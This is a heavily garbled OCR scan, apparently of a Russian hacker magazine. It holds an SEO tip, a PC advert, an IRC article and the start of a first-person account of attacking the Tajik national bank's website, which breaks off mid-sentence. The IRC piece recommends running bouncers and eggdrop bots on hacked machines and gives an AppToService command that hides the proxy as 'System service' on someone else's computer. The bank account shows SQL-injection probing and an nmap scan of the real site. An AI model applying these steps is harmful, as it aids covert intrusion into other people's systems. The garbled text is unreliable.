[рекламные агентства] Если у тебя нет времени заниматься продви- 
жением сайта самостоятельно, то ты можешь нанять профессионалов. 
Хорошо, что рекламных агентств в инете пруд пруди. Но будь готов к то- 
му, что даже за самые элементарные действия с тебя сдерут кругленькую 
сумму. Например, за сабминт твоего сайта в поисковиках рунета могут 
попросить $300 — 400. Есть и другой путь — нанять частных промоутеров. 
Это дешево и одновременно очень эффективно (иногда они справляются 
со своей задачей намного лучше зазноб из агентств). Однако и здесь воз- 
можен лохотрон. Некоторые личности, выдающие себя за профи, просто 
накрутят счетчики, а тебе выдадут длинный отчет о лжеработе, где якобы 
повысились результаты в поисковиках, поднялся ИЦ и другие показатели. 
Обман раскроется уже после того, как ты заплатишь деньги. 

[заключение] Многие веб-мастера допускают одну и ту же ошибку — 
закачав сайт в Сеть, крайне неохотно берутся за его поддержку и прод- 
вижение. Помни: первые места занимают только самые упорные. Такая 
философия справедлива даже для Интернета. © 









Создай свою реальность 

с компьютером ОЕРО Едо на базе процессора ІпЪеІ® РепЪішп® 4 с технологией НТ 





Включи ОЕРО Едо — и перед тобой откроется новая реальность твоих 
любимых компьютерных игр. Наслаждайся быстротой реакции и скоростью, 
исследуй распахнувшийся перед тобой мир высококачественной 
компьютерной графики и настоящего экшена. Теперь эта цифровая 
реальность может стать твоей благодаря компьютеру ОЕРО Едо на базе 
процессора ІпЪеІ® РепЪіит® 4 с технологией НТ. 
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ЛЕРО Едо 360 ТѴ: 

• процессоры ІпЪеІ® Репйит® 4 с технологией НТ серии бхх (2Мб сазіі второго ур 

• чипсет ІпЬеІ® 925ХЕ с улучшенной архитектурой 

• сверхбыстрая память ЕЮР2 

• новые возможности графики РСІ-Ехргезв 

• реалистичный объемный 8-канальный звук 




Компания ОЕРО СотриСегз Тел./факс: (095) 969-2215, \л/\л/\л/.с!еро.ги 



ІпЬеІ, ІпЬеІ Іпзісіе, Ыге ІпЬеІ Іпзісіе І_одо и ІпЪеІ РепЬіит являются зарегистрированными товарными знаками ІпЬеІ СогрогаЫоп и её отделений в США и других странах 
МісгозоІТ и ѴѴІпсІоѵѵз являются зарегистрированными товарными знаками компании МісгозоШ и её отделений в США и других странах. 




ЮНИТЫ КРЕАТИФФ КОДИНГ ІЛЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ [РС_2СШЕ] РЕВВІІМ НЬЮСЫ 
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Ставим 

«Ирочку» в позу 

Выжимаем из ІВС максимум 



0 ТОМ, ЧТО ТАКОЕ ІВС (ІІЧТЕВІМЕТ ВЕЬАУ 
СНАТ), ЗНАЮТ ВСЕ. МНОГИЕ ДАЖЕ ИСПОЛЬ- 
ЗУЮТ СКРИПТЫ ДЛЯ ПОПУЛЯРНОГО МІВС’А 
И ВОСТОРЖЕННО ТРЕПЕЩУТ ОТ ФУНКЦИЙ, 
КОТОРЫЕ ПОЗВОЛЯЮТ АВТОМАТИЧЕСКИ 
ИДЕНТИФИЦИРОВАТЬСЯ НА СЕРВЕРЕ 

И УСТАНАВЛИВАТЬ СТАТУС АѴѴАѴ. НО ПО- 
ВЕРЬ, ЧТОБЫ ИСПОЛЬЗОВАТЬ ВОЗМОЖ- 
НОСТИ ІВС НА ПОЛНУЮ КАТУШКУ, НЕОБХО- 
ДИМО ПОЗНАКОМИТЬСЯ ЕЩЕ С НЕСКОЛЬ- 
КИМИ ПОЛЕЗНЫМИ ПРИМОЧКАМИ, БЕЗ КО- 
ТОРЫХ, ВОЗМОЖНО, ТЫ В СКОРОМ ВРЕМЕ- 
НИ НЕ БУДЕШЬ ПРЕДСТАВЛЯТЬ ЖИЗНИ 

1 Степан Ильин ака Зіер (5Іер@датеІапсІ.ги) 




Несколько ботов можно 
объединить в одну сеть. 
Получится ботнет, с по- 
мощью которого можно 
творить чудеса. Например, 
ООоВ’ить недруга :). 




Все упомянутые в статье 
программы мы любезно 
выложили на наш СО/ОѴО. 




еддбгор.огд.ш — отечественный сайт по еддбгор’ам. 
ЫірУ/шІюІок. сош/ігс — пишем бота на РегІ’е. 
шшш.5СІіитапп.сх/ігсд/ігсд4.рІір — для тех, кто хочет 
написать ІНС-гейт на РНР. 

Ьезіігс.пеі.ги — большой русскоязычный сайт по ІРС. 



[зоскз Ѵ5. Ьпс] Как доблестный читатель X, ты навер- 
няка задумываешься о безопасности своей работы в 
инете и об анонимности, которая иногда бывает очень 
кстати. Общение в ІВС напрямую с сервером опасно тем, 
что любой желающий легко может узнать твой ІР, а это, 
как известно, чревато последствиями. Пускай машину 
твою и не взломают, но устроить тебе неплохой ООоЗ 
вполне могут. Забавы ради, например. Самое банальное 
решение проблемы — подключиться к ІВС-серверу через 
ЗОСКЗ, но здесь есть несколько недостатков. Во-пер- 
вых, 30СК34 крайне ограничен в возможностях, поэто- 
му комфортная работа с его помощью весьма сомни- 
тельна. Придется искать именно 30СК35, а это уже нес- 
колько сложнее. Во-вторых, большинство носков (осо- 
бенно из открытых источников) не отличаются постоян- 
ством. Сегодня соке работает, завтра — нет, и это на са- 
мом деле очень серьезная проблема. Представь, что у 
тебя на определенное время забита стрелка на таком-то 
сервере и канале, а ты попросту не можешь приконнек- 
титься к нему, так как соке упал в этот самый неподходя- 
щий момент. И еще один момент: анонимность через 
соке, то есть отсутствие на нем логов, людей в форме и 
прочих неприятных вещей, также сомнительна. Чтобы 
быть уверенным наверняка, придется использовать плат- 
ные прокси-сервисы (вроде ѵѵѵѵѵѵ.ргоху-зоекз.пеі), а они 
за свои услуги требуют денежку (30—80$). 

Всех этих недостатков лишен так называемый баунсер 
(ВЫС) или специализированная ІВС-прокся. 

[Ьпс под винду] Фишка такой проги заключается в 
том, что пользователь не подключается напрямую к сети, 
а коннектится к ВЫС, а она перенаправляет его на насто- 
ящий ІВС-сервер. Получается, что пользователь не па- 
лит свой собственный ІР: вместо него отображаются «ко- 
ординаты» ВЫС-сервиса. К сожалению, большинство ба- 
унсеров разработаны для *піх-систем, среди них — попу- 
лярные егЬоипсе и рзуВІМС. Проблема в том, что для их 
установки потребуется честно купленный шелл (это нак- 
ладно) либо взломанный *піх-сервер (а это довольно 
сложно в исполнении). В то же время благодаря куче 
критических уязвимостей и паблик-эксплойтов добыть 
шелл на виндовой тачке сегодня пара пустяков. Так по- 
чему бы этим не воспользоваться? 




ІВС-ргоху слушает 6666, 6667, 6668, 6669 порты 



Правда, выяснилось, что подходящих реализаций под винду не так мно- 
го. Среди найденного могу выделить только ігергоху (илл /ѵѵ. ігергоху. підМ- 
ІідМ.пеі), РгоВІМС (ѵѵѵѵѵѵ.ргоЬпс.сот) , ѴѴіпВІМС ( ѵѵѵѵѵѵ. ігсасітіп леі/Ьпс) . Две 
последние имеют графический интерфейс, но в нашем случае это не 
очень хорошо. Такие приложения незаметно установить в системе до- 
вольно сложно, поэтому консольная прога ігергоху имеет преимущество. 
Да и возможностей у нее, надо отметить, будет побольше. 

Настройка программы осуществляется через текстовые конфиги, имею- 
щие расширения *.соп! и расположенные в папке ОАТА. Предлагаю 
кратко рассмотреть каждый из конфигов и попутно вносить необходи- 
мые изменения. 

ВЕЗОІ_Ѵ.СОІ\ІР. В этом файле указывается 0145-сервер, чтобы прога 
могла правильно распознать ІР-адрес сервера по его символьному име- 
ни (ігс.баі.пеі и т.п.). Само собой, 0145-сервер можно прописать абсолют- 
но произвольный, но если хочешь использовать провайдерский, то на- 
бери в командной строке пзіоокир, чтобы выяснить его. 

АССЕ55.СОІ4Р. С помощью этого файла ты можешь ограничить доступ 
к баунсеру с определенных ІР-адресов. Формат файла сильно напоми- 
нает апачевский .Піассезз. 

ОЕРАШТ ОЕІ4Ѵ 
ОРЮЕВ ОЕІ4Ѵ,АІ_І_ОѴѴ 
АІ_І_ОѴѴ ІосаІПозІ 
ОЕІ4Ѵ *.тісгозоК.сот 
ОЕІ4Ѵ МэіІІдаІез.сот 

Логика простая: с помощью параметра АІ_І_ОѴѴ обозначаются те ІР, с ко- 
торых доступ разрешен, с помощью ОЕІ4Ѵ — те, которым в подключе- 
нии будет отказано. 

ЮЕІ4Т.СОМР. В этом файле можно обозначить порты, на которых встро- 
енный ібепі-демон будет получать запросы от сервера. Формат файла 
Ы5ТЕІ4 <Но5І>:<РогЪ>, однако в большинстве случаев его содержимое 
можно оставить по умолчанию. 

І.І5ТЕІ4.СОІ4Р. С помощью этого конфига обозначаются сетевые интер- 
фейсы и порты, на которых будет работать ВІ\ІС-демон. По умолчанию 
ВЫС принимает подключение на всех сетевых интерфейсах (для этого 
указывается ІР-адрес 0.0. 0.0) на портах 6666, 6667, 6668, 6669. Реко- 
мендую использовать какой-нибудь нестандартный порт, чтобы ВЫС 
сложнее было засечь сканером. 

ІІЗЕП.СОМР. По названию легко догадаться, что в этом файле прописы- 
ваются аккаунты пользователей. Формат прост: ІІ8ЕВ:изегпате:разз- 
ѵѵогсі. Пароль может быть прописан как ріаіп-іехі’ом, то есть в открытом 
виде, так и представлен в виде хэша. Для создания хэша используется 
утилита МКРА88Ѵ\Ю.ЕХЕ, которая идет в комплекте с программой. 
СОІ4І4.СОІ4Р. Самый главный конфигурационный файл, в котором ука- 
зывается информация о подключениях к настоящим серверам. Начать 
стоит с того, что каждое подключение имеет имя — оно указывается 
сразу после ключевого слова СОІ4І4ЕСТІОІ4. Это имя нужно запомнить, 
так как оно потребуется при подключении к настоящему сервису. Далее 
с помощью специальной структуры (пример дан в самом конфиге) опи- 
сываются многочисленные параметры подключения. 

После редактирования конфигов можно приступать к запуску ВЫС, а за- 
одно и любимого ІВС-клиента, чтобы сразу проверить правильность 
подключения. После соединения с ВЫС сервер потребует ввести па- 
роль, который ты указывал в настройках, а также выбрать одно из про- 
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МАСКИРОВКА ПО-НАШЕМУ 

В тексте статьи остался один нераскрытый вопрос: как замас- 
кировать ВІ\ІС и ѵѵіпсігор в чужой ѴѴіпсІоѵѵз-системе? Понятно, 
что оставлять консольное окошко с работающим приложением 
нельзя, так как его сразу заметит пользователь. Самый прос- 
той выход из этой ситуации — запустить приложение как сер- 
вис, тем самым мы убьем сразу двух зайцев. Во-первых, при- 
ложение легко затеряется среди многочисленных служб вин- 
ды, в которых обычный пользователь никогда не станет ко- 
паться. А во-вторых, с умом обеспечим автоматический запуск 
проги во время запуска системы, на случай, если компьютер 
будет перезагружен или выключен. Единственная проблема 
заключается в том, что по умолчанию возможности запуска 
ігсргоху и ѵѵіпсігор как сервиса нет, поэтому нам придется при- 
бегнуть к помощи сторонних приложений. Я рекомендую ис- 
пользовать консольную утилиту АррТоЗегѵісе 
(шш. Ьазіа.сот/РгосІ АррТоЗегѵісе. іііт). Отмечу, что ее послед- 
ние версии стали платными, поэтому лучше будет не мучиться 
с регистрацией и скачать вариант постарее 
(тѵѵѵ.ЗсІпеѵѵз.ги/сІоситепіз/1 143/ АррТоЗегѵісе. гір). Если запус- 
тить программу без каких-либо ключей, АррТоЗегѵісе выдаст 
краткую справку, которой вполне достаточно, чтобы составить 
команду для запуска нашего приложения. Вот пример: 
С:\ІВСРВ0ХѴ>аррІ05егѵісе /ІпзІаІІ "ІВСРВОХѴ.ЕХЕ" 
/АЬ5І\Іате: м Зу5{ет зегѵісе" /Зіаііир :А 
Ігсргоху будет запущена как сервис с именем Зузіет зегѵісе, 
причем следующий запуск этого сервиса будет осуществлять- 
ся автоматически. 



писанных в конфиге соединений. После успешной авторизации ты уви- 
дишь краткую справку о командах, с которыми, я уверен, ты разберешь- 
ся сам. Особенно отмечу функции АТТАСНЮЕТАСН, позволяющие ВІ\ІС 
постоянно пребывать на ІВС-каналах во время твоего физического от- 
сутствия. Теперь, вновь подключившись к ВЫС, ты сможешь просмот- 
реть все сообщения за время твоего отсутствия. Очень приятная штука. 

[ІКС-шлюз] ВІ\ІС-сервер установлен на нескольких шеллах и работает 
как часы. Ты даже умудрился извлечь из этой затеи выгоду, продав нес- 
колько аккаунтов поклонникам ирки, среди которых такой товар счита- 
ется особенно ходовым. Пора настроить еще одну интересную приблуду 
— ІВС-гейт. Смысл его использования прост: если под рукой нет ІВС- 
клиента, то всегда можно зайти на определенный сайт и общаться на 
нужном канале, используя один лишь браузер. Надо сказать, что шлюз 
в ІВС через веб-интерфейс является настоящей находкой для всех тех, 
кто имеет свой собственный канал или даже I ВС-сервер. Некоторые ма- 
газины и различные онлайн-сервисы, к примеру, осуществляют подде- 
ржку клиентов через ІВС, используя все его прелести и удобства. Загво- 
здка в том, что клиент далеко не всегда знаком с этой технологией, и 
ему куда проще зайти на определенный сайт, нежели разбираться с ус- 
тановкой и настройкой непонятной программы. Предоставим ему такую 
возможность. 

Изначально я подумал, что скрипт, написанный на РегІ или РНР, будет 
идеальным вариантом. Скачал продвинутый СОЫВС ( Шр://сдіігс.зоигсе - 
іогде.пеі! ) и приступил к его установке. Сразу же огорчило то, что скрипт 




работа с ІВС возможна через 50СКЗ- 



сервер, но это по некоторым причинам 
не очень удобно 



работает исключительно на 
*піх-системах, то есть о по- 
тенциальной установке под 
виндой пришлось сразу же 
забыть. Впрочем, большин- 
ство хостингов все равно 
работают под управлением 
различных вариаций Ыпих’а 
и ВЗО, так что потеря неве- 
лика. Значительно хуже то, 
что для каждого подключив- 
шегося пользователя 
скрипт поднимает отдель- 
ный системный процесс. Ты 
представляешь, что будет с 
системой, если этим скрип- 
том одновременно восполь- 
зуются, скажем, человек 100? Админ, вероятно, захочет тебя убить и не- 
медленно заблокирует доступ к твоему ресурсу, как только заметит уро- 
вень нагрузки скрипта на сервер. Будь уверен, что он заметит это очень 
быстро. А мораль такова: устанавливать такой скрипт можно только с 
полной уверенностью, что он не будет одновременно использоваться 
множеством клиентов. Сама установка осуществляется в 4 несложных 
этапа: 

И Закачка исходников с официального сайта, желательно в архиве Іаг.дг. 
\2\ Создание на сервере в директории сді-Ьіп новой папки 
с последующим копированием туда содержимого архива. 

13 Выставление для скриптов прГі-ігс.сді, ігс.сді, сііепі-регі.сді 
права доступа 755 (-гѵѵхг-хг-х). 

3 Правка параметров работы скрипта, которые находятся 
в текстовом конфиге сдіігс.сопіід. 

Все опции и параметры из конфига предельно понятны, поэтому под- 
робно не имеет смысла их описывать. Единственное замечу, что более 
тонкую настройку скрипта можно провести, переименовав файл 
сдіігс.сопіід.іиіі в сдіігс.сопТід. Часть новых опций позволит разграничить 
доступ, выбрать используемую кодировку по умолчанию и т.п. 

После несложной установки скрипта ты наверняка по достоинству оце- 
нишь его возможности. Надо отдать честь разработчикам, ведь с по- 
мощью НТМІ_, иаѵаЗсгірІ и РегІ им удалось собрать полноценный ІВС-кпи- 
ент, который мало чем отличается от обычного программного решения. 
Те же возможности и функции, тот же внешний вид и удобство в исполь- 
зовании. Правда, несколько раздражают задержки в отправке сообщений 
на сервер, но, видимо, при таком раскладе избежать их не получится. 
Прямая альтернатива СОЫВС — специальный ^ѵа-апплет, который 
имеет аналогичные возможности. Такой как іѵѵігс ( ѵѵѵѵѵѵ/ѵѵігс.сот ). Фиш- 
ка в том, что апплет можно установить на любом хостинге. Неважно, бу- 
дет ли это дорогостоящий сервис с широчайшими возможностями или 
же бесплатный вариант со скудным набором функций и жесткими кво- 
тами. ^ігс не требует поддержки РегІ, РНР или какого-либо другого 
языка, а весь процесс установки заключается в том, чтобы залить на 
сервер необходимые файлы. Единственное условие - наличие на хос- 
тинге 280 Кб дискового пространства. 

Никакой настройки, по большому счету, не требуется. Достаточно запустить 
НТМІ_’ку, в которой прописаны параметры запуска апплета. Вот теперь мож- 
но приступать к действию. Пользователь сам через графический интерфейс 
выберет сервер, к которому необходимо подключить свое имя, пароль для ав- 
торизации у піскзегѵ’а, каналы для общения и т.д. Считаешь, что он может не 
справиться? Не беда, с помощью НТМІ_ можно задать значения полей по 



МОБИЛЬНАЯ «ИРИНКА» 

Согласись, очень часто бывают ситуации, когда нужно просто 
убить время. Ну, например, девушка опаздывает на встречу, и 
ты в полном одиночестве ждешь ее в кафе. Общение с народом 
ІВС — отличный выход из сложившийся ситуации. Для обычных 
мобильных телефонов, поддерживающих Оаѵа и работу с соке- 
тами, существует сразу несколько подходящих апплетов ѴѴІЫгс 
(ШрУ/теІеззігс.зоигсеІогде.пе1І), ітігс (Шр://ітігс.зоигсеІогде.пеі /) , 
Ѵігса ( уѵуѵуѵ. ѵісіагііоіеп леі/сопіепіз/ѵігса/) . Я лично использую пос- 
ледний и могу точно утверждать, что он поддерживает одновре- 
менную работу с несколькими каналами, профайлы для сохра- 
нения имени пользователя и пароля, прокрутку логов, и, конечно 
же, русские кодировки. Если у тебя смартфон на базе ѴѴіпсІоѵѵз 
МоЬіІе 2003, то рекомендую ѵѵтІВС ( ѵѵтігс.сот ). Он также имеет 
продуманный интерфейс и поддержку нескольких каналов. 




Іаѵа-апплет для доступа на ІВС не требует настройки и работает как часы 
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РгоВЫС имеет графический интерфейс, 

но незаметно установить его на удаленной машине не получится 



умолчанию, в том числе и 
нужный сервер/канал. От 
пользователя в этом случае 
потребуется лишь нажать на 
одну кнопку «Соединиться». 
Вообще, если говорить на- 
чистоту, ^ѵа и талант разра- 
ботчиков позволили создать 
полноценного ІВС-клиента 
внутри окна браузера. Даже 
БСС-функции реализованы, 
как у обычного плІВС’а. И са- 
мое приятное: в отличие от 
СѲЫВС, апплет іѵѵігс практи- 
чески не загружает сервер. 

[бот-плацдарм] Создать и зарегистрировать свой собственный ІВС- 
канал — не проблема. Значительно сложнее уследить за порядком, 
обеспечить автоматическую раздачу статусов, защитить канал от флу- 
деров и любителей ООоЗ’а. Обычному человеку это под силу с больши- 
ми ограничениями, ведь присутствовать на канале 24 часа в сутки — не- 
возможно чисто физически. Чтобы облегчить жизнь операторам, были 
разработаны так называемые боты, в задачи которых входило постоян- 
ное присутствие на канале и автоматическое выполнение запрограмми- 
рованных действий. Но и здесь не обошлось без затруднений. 

Сама настройка бота не такая уж и сложная. Значительно труднее най- 
ти место, где этого бота можно установить. Сделать это на легально 
купленном шелле не всегда возможно. Если к ВІ\ІС в последнее время 
относятся достаточно лояльно, то I ВС-боты и демоны по-прежнему зап- 
рещены почти везде. Так что бота, возможно, придется поднимать на 
порутанной машине, дорогостоящем дедике или локальном компьютере 
(не самый лучший вариант, но подойдет на случай небольшой нагрузки). 
Признанным лидером среди ботов является еддбгор ( шш.еддіпеасіз.огд ). Мы 
воспользуемся его версией под ѴѴіпбоѵѵз, скомпилированной с помощью 
судѵѵіп’а (ѵѵѵѵѵѵ.судѵѵіп.сот) . Ее имя — ѴѴіпбгор (ѵѵіпсігор.зоигсеіогде.пеі) . 
С официального сайта можно стянуть две вариации: для ІВС сетей, под- 
держивающих длину ника максимум в 9 символов (ВСІМеІ, ЕРЫеІ), и для 
тех, у кого такого ограничения нет (ОиакеІЧеІ, ОаІІМеІ и т.д.). Соответ- 
ственно, выбирай нужную, исходя из конкретной ситуации, так как по 
функциональности версии ничем не отличаются. 

Основной конфигурационный файл у программы один — еддбгор. сопі. 
Но он содержит настолько много опций, что привести их описание здесь 
представляется абсолютно невозможным. Да и не нужно, так как разра- 
ботчики снабдили конфиг подробными комментариями, поэтому ты лег- 
ко сможешь разобраться с каждой из опцией сам. На случай, если с анг- 
лийским ты не в ладах, рекомендую закачать конфиг с комментами на 





соединение с баунсером установлено — 
можно соединяться с ІВС 



русском языке (мѵи і.атіда.огд.ги/едд6гор/едд6гор_сопіідХх\). В конфиге 
несколько раз встречаются строки следующего содержания — біе "Ѵои 
бібп'І ебіі уоиг сопіід Іііе сотріеіеіу Ііке уои ѵѵеге оіб, біб уои?". Если их не 
убрать/закомментировать, то программа вылетит при запуске с соотве- 
тствующей ошибкой. Подобным образом разработчики проверяют, нас- 
колько внимательно ты прочитал комментарии к конфигурационному 
файлу. Так что будь внимательнее — не засыпай. 

После того как необходимые параметры будут обозначены, можно присту- 
пать к первому запуску. Для этого надо перейти в папку с программой (по 
умолчанию, с:\ѵѵіпбгор) и запустить исполняемый файл еддбгор.ехе с пара- 
метром -т. Если прога будет ругаться на какую-то ошибку, рекомендую 
обратиться к официальному РАО’у ѵѵіпбгор’а ( уѵіпсігор.зоигсеіогде.пеі/уѵіп - 
йгорІад.ЫтГ). В нем собрана огромная подборка ответов практически на 
любые вопросы, а также рекомендации по решению проблем. 

Если запуск прошел успешно, бот должен соединиться с заданным в кон- 
фиге ІВС-сервером. Настало время оформить свои права на собствен- 
ность. Как только ты напишешь боту слово НеІІо (/тзд ЬоІ_пате ПеІІо), он 
запомнит тебя как владельца, потребует установить пароль, который в бу- 
дущем будет использоваться тобой для идентификации. Управление бо- 
том может осуществляться двумя способами. Первый из них — БСС СПаІ. 
Для инициализации такого чата нужно в командах серверу написать: /сіср 
<ЬоІ_пате> СНАТ. Бот получит запрос на соединение и также откроет 
ОСС-соединение. Для дальнейшей работы придется ввести имя (то, кото- 
рое было у тебя на момент отправки боту сообщения ПеІІо), а также па- 
роль. В случае успешной авторизации ты получишь доступ к командной 
консоли бота. Интереса ради попробуй ввести команду — .Пеір (все ко- 
манды в консоли бота пишутся через «точку»), и ты получишь небольшую 
справка о возможных командах. Если БСС-чат по каким-то соображени- 
ям тебя не устраивает, то возможно управление ботом через обычный ІеІ- 
пеі. В файле еддбгор.сопі по умолчанию прописана строка «Іізіеп 3333 
аІІ», обозначающая, что на 3333 порту работает іеіпеі-сервер, причем он 
доступен как обычным пользователям, так и таким же ботам, как он сам. 
Для соединения достаточно набрать Іеіпеі <ІР-бота> 3333 и пройти авто- 
ризацию. Если стандартный — 3333-порт занят или блокируется файрво- 
лом, ничто не мешает тебе использовать любое другое значение этого па- 
раметра. На работе бота это никоем образом не отразиться. 

Я намеренно не говорю о функциональности еддбгор’а. На все случаи 
жизни существует подключаемые ТСІ_-скрипты, с помощью которых 
можно решить даже самые изощренные задачи. Наиболее полным хра- 
нилищем скриптов является сайт ѵѵѵѵѵѵ.еддЬеІр.огд, там же находятся 
инструкции и рекомендации по их установке. В общем случае достаточ- 
но скопировать нужный ТСІ_-файл (скрипт) в папку зсгіріз и в конфиг бо- 
та добавить строку зоигсе зсгірІз/<зсгірІпате>.ІсІ. Умельцы на базе 
еддбгор’а и ТСІ_ умудрились наладить чекалки кредитных карт, поэтому 
можно с полной уверенностью утверждать, что твой бот, по крайней ме- 
ре, справится с автоматической раздачей статусов и борьбой с флуде- 
рами. А это, в принципе, его основные задачи. 



[генераторы статистики] Раскрутить канал, то есть сделать его попу- 
лярным, можно по-разному. Для начала неплохо было бы разрекламиро- 
вать его, раздавать на канале различные бонусы и т.д. Еще одним ходом, 
дающим 100% результат, является подсчет различных статистических 
данных канала. Спортивный интерес — это действительно очень мощная 
штука. Оформи красивую статистику с подсчетом проведенного посетите- 
лями канала времени, количеством напечатанных слов и букв — и можно 
считать, что дело в шляпе. Вот увидишь, пользователи тут же начнут флу- 
дить изо всех сил, чтобы забраться на верхние позиции в рейтинге. 
Скрипт для подсчета статистики без труда можно прикрутить для 
еддбгор’а, но я предпочитаю другой вариант — специализированные 
анализаторы логов. Утилита Різд (аббревиатура от РегІ ІВС Зіаіізіісз 
(Зепегаіог) является наиболее продвинутой в этом плане. Все, что нуж- 
но для составления отчета, — это логи бота или I ВС-сервера, а также 
компьютер с установленным РегІ. Парамет- 
ры, которые необходимые для составле- 
ния, можно задать через командную стро- 
ку, но разработчики настоятельно рекомен- 
дуют оформить их в виде ХМЬконфига 
(різд.сід). В нем можно указать все: начи- 
ная от внешнего вида выходного НТМІ_-до- 
кумента и заканчивая словами, которые не 
используются при подсчете статистики. 
Особенно радует то, что выходной файл со- 
держит не только сухие цифры, но еще и 
наглядные диаграммы и графики, что при- 
дает статистике более наглядный вид. Чуть 
не забыл: прогу можно закачать отсюда 
или же взять с нашего СО/ОѴО © 
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ЧЕЛОВЕК ОБЫЧНЫЙ 




- НИКИТА. 

- 21 ГОД. „ 

- НЕГЛУПЫЙ парень. 

- УВЛЕКАЕТСЯ СПОРТОМ. 

- ХОРОШЕЕ ЗРЕНИЕ. 

- НЕ ИМБИЦИЛ. 



УВЛЕКА 



ИМ 

тся 



СНОУБОРДОМ. 



Фитнес 

3 ЧАСА НА ПРОКАЧКУ 
ТЕЛА. 



-Лі&ііа 



Клубы 

ЛЮБИТЕЛЬ ТЕХНО- 
ВЕЧЕРИНОК. 



Шмотки 

ДЖИНСЫ ОТ ОІЕЗЕ1_. 







ЖЕСТОКИЙ КОДЕР 

- АЛЕША. „ 

- ПОЛНЫЙ АЛЕША. 




Геморрой 

ЧТО ТЫ ХОТЕЛ? ЖОПА 



ДАВНО СРОСЛАСЬ СО 
СТУЛОМ. 



- 25 ЛЕТ. 

- СТРАШНО СМОТРЕТЬ. 

- МНОГО ПРОГРАММИРУЕТ. 

- РЕДКО ВЫХОДИТ ИЗ ДОМА. 

- НА ВИНТЕ 40ГБ ПОРНУХИ. 

- НЕ ГОДЕН ДЛЯ СЛУЖБЫ В АРМИИ. 



Мышцы 

ИХ МАЛО. ДЕФИЦИТ. 



Сколиоз 

БЕДОЛАГУ СКРУТИЛО 
ЗА КОМПОМ. 



Подружка 



Мозг 

ВЫЖЖЕННЫЙ 

МОНИТОРОМ. 



Зрение 

ХРЕНОВОЕ. ОБА ГЛАЗА 
-6. ОЧКИ НЕСЪЕМНЫЕ. 



Мозоли 

НА ЛАДОНЯХ. 
ОТ ГЛУПОСТЕЙ. 



Спорт 

ГОНЯЕТ В ОЗ. 



Локтевая 

нейропатия 

ЕЛОЗИТ ЛОКТЯМИ 
ПО СТОЛУ. 



Шмотки 

ПОСМОТРИ НА НЕГО. 
ОНИ ЕМУ НЕ НУЖНЫ. 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІЛЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 



ІІІн 




ТвіІКіяІан 



Гочикистонский косяк 



Взлом сайтов национального банка, Минфина и Президента Таджикистана 



г 



БОЛЬШИНСТВО ЛЮДЕЙ, СТАЛКИВАЯСЬ С САЙТАМИ 
СЕРЬЕЗНЫХ ОРГАНИЗАЦИЙ ВРОДЕ НАЦИОНАЛЬНО- 
ГО БАНКА, МИНИСТЕРСТВА ФИНАНСОВ, ПРАВИТЕЛЬ- 
СТВА И АДМИНИСТРАЦИИ ПРЕЗИДЕНТА, СРАЗУ БРО- 
САЮТ ГЛУПУЮ ИДЕЮ ПОЛОМАТЬ АВТОРИТЕТНЫЙ 
РЕСУРС. НАИВНЫЕ РЕБЯТА. ТЕБЕ ОСТАЕТСЯ ТОЛЬКО 
РАДОВАТЬСЯ: Я НЕ ИЗ ИХ ЧИСЛА И РАССКАЖУ ТЕБЕ 
СЕГОДНЯ, КАК МНЕ УДАЛОСЬ ВЗЛОМАТЬ САМЫЕ 
ГЛАВНЫЕ САЙТЫ СТРАНЫ, ИЗВЕСТНОЙ СВОИМИ 
ТРУДОЛЮБИВЫМИ ГАСТАРБАЙТЕРАМИ И МИЛЛИАРД- 
НЫМИ НАРКОПОТОКАМИ, ТЕКУЩИМИ ЧЕРЕЗ ВЫСО- 
КИЕ И КРАСИВЫЕ ГОРЫ НА СЕВЕР I МогрНеиЗ(иіп: 371200) 






к 



[первое знакомство] Я уже 

собрался выходить в оффлайн, 
как вдруг один мой знакомый 
постучал в асю и попросил пос- 
мотреть на странный зці-іпіес- 
Ііоп. Перейдя по предоставлен- 
ному линку, я быстро принялся 
анализировать явный инжект. 
Казалось, я все делал правиль- 
но, но по непонятным причинам 
желаемого не получал. Я совсем 
увлекся исследованием бага, 
и вдруг мой товарищ сказал: 

«А знаешь, что ты сейчас лома- 
ешь? Загляни на индекс». 
Перейдя на индексную страницу, 
я лицезрел гордую надпись: На- 
циональный Банк Таджикистана. 

т V 




[думаем о здоровье] В тот же момент 
я перепроверил свою проксю на аноним- 
ность и со спокойной душой принялся 
анализировать сайт дальше. 

Пройдясь по линкам и посмотрев структу- 
ру сайта, я ничего интересного не обнару- 
жил. Сайт работал на самописном движ- 
ке, никаких особых скриптов там не было, 
акцент был сделан именно на информа- 
тивность сайта. Из найденных недорабо- 
ток была разве что та зці-инъекция, кото- 
рую мне показал приятель, но я не мог 
ее грамотно заюзать. 

Почему-то в голове сразу промелькнула 
мысль: «Да это же банк. Здесь не может 
быть ошибок. Уходить надо отсюда и за- 
быть про все». Хотя постой, как же это 
так «не может быть ошибок», тут же в 
скрипте примитивная инъекция!. В жиз- 
ни не бывает случайностей. 

Я стал размышлять дальше. Раз сайт 
часто обновляется и модерируется, ду- 
мал я, значит, обязательно должна быть 
админка. Надо попробовать найти ее. 
Особо не раздумывая, я ввел в адресную 
строку браузера Ыф://асІтіп.Ьапк.ги и тут 
же получил пощечину: такого адреса не 

на уѵуѵуѵ.пЫ.Іі/абтіп и уже приготовился к 
очередному отказу, как вдруг увидел 
форму для ввода логина и пароля. Ну, 
вот уже кое-что. Проверка скрипта авто- 
ризации на различные баги ни к чему не 
привела, все было написано нормально. 
Либо все вредоносные символы жестоко 

была примитивной, пароль был жестко 
зашит в теле самого скрипта. 
Отчаявшись, я запустил птар, решив для 
своего спокойствия просканить сервер: 
птар -5 У -Р шш.пЫ.і]. Не надеясь на чу- 
до, я узнал, что на сервере открыты стан- 
дартные 80, 21 , 22 и 3306 порты. Из серви- 
сов были установлены РгоРТРЭ и ЗЗН. 

ные, а достать приватные сплоиты для ме- 
ня не было возможности. Я решил любой 
ценой прогрызть себе дыру через ѵѵеЬ. 
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[свежий взгляд] Вернувшись 
на сайт, буквально сразу же я за- 
метил неприглядную кнопочку пе- 
реключения языка: были доступ- 
ны русский и английский. Естест- 
венно, я не обратил на нее внима- 
ние с самого начала, ведь сер- 
фить на русском куда привычнее. 
Я загрузил английскую версию 
сайта и заметил, что игі страницы 
сменился на ѵѵтѵ.пЬи/еп. Навер- 
ное, у них просто сохранена точ- 
ная структура сайта в папке /еп. В 
